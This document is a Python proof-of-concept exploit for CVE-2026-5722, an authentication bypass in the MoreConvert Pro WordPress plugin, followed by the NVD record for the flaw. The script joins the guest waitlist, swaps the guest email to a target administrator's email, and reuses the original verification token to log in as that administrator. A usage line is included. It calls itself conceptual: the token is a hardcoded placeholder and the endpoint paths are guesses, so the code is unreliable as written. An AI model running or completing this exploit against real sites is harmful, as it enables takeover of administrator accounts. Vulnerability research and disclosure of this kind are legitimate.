CVE-2026-5722

import requests def exploit_cve_2026_5722(target_url, attacker_email, target_admin_email): """ Conceptual PoC for CVE-2026-5722 Authentication Bypass """ session = requests.Session() # Step 1: Attacker joins the guest waitlist to get a valid token # Endpoint structure may vary based on plugin implementation waitlist_endpoint = f"{target_url}/wp-json/mc/v1/waitlist" payload_join = { "email": attacker_email, "product_id": 1 } try: response = session.post(waitlist_endpoint, data=payload_join) if response.status_code == 200: # Assuming the token is returned in the response or sent via email (simulated here) verification_token = "simulated_token_from_response" print(f"[+] Token obtained: {verification_token}") # Step 2: Change the guest email to the target admin email # This simulates the logic flaw where changing email does not invalidate the token update_endpoint = f"{target_url}/wp-json/mc/v1/waitlist/update" payload_update = { "current_email": attacker_email, "new_email": target_admin_email } # The request might need the token or cookie to identify the guest session update_response = session.post(update_endpoint, data=payload_update) if update_response.status_code == 200: print("[+] Email updated successfully to target admin email.") # Step 3: Use the original token to authenticate as the target user verify_endpoint = f"{target_url}/wp-json/mc/v1/waitlist/verify" verify_payload = { "token": verification_token } final_response = session.get(verify_endpoint, params=verify_payload) if final_response.status_code == 200: print("[!] EXPLOIT SUCCESSFUL: Authenticated as " + target_admin_email) return True else: print("[-] Verification failed.") else: print("[-] Failed to update email.") else: print("[-] Failed to join waitlist.") except Exception as e: print(f"[-] Error: {e}") return False # Usage # exploit_cve_2026_5722("http://example.com", "[email protected]", "[email protected]")

{"cve": {"id": "CVE-2026-5722", "sourceIdentifier": "[email protected]", "published": "2026-05-05T02:16:05.020", "lastModified": "2026-05-05T19:09:32.000", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MoreConvert Pro plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.9.14. This is due to the guest waitlist verification flow not invalidating or regenerating verification tokens when the customer email address is changed. This makes it possible for unauthenticated attackers to authenticate as existing users, including administrators, by obtaining a valid guest verification token for an attacker-controlled email, changing the same guest customer email to the target account email through the public waitlist flow, and then using the original verification link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://moreconvert.com/changelog/", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/smart-wishlist-for-more-convert/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fe887475-f7e8-4fda-a793-bc6f37b70f3e?source=cve", "source": "[email protected]"}]}}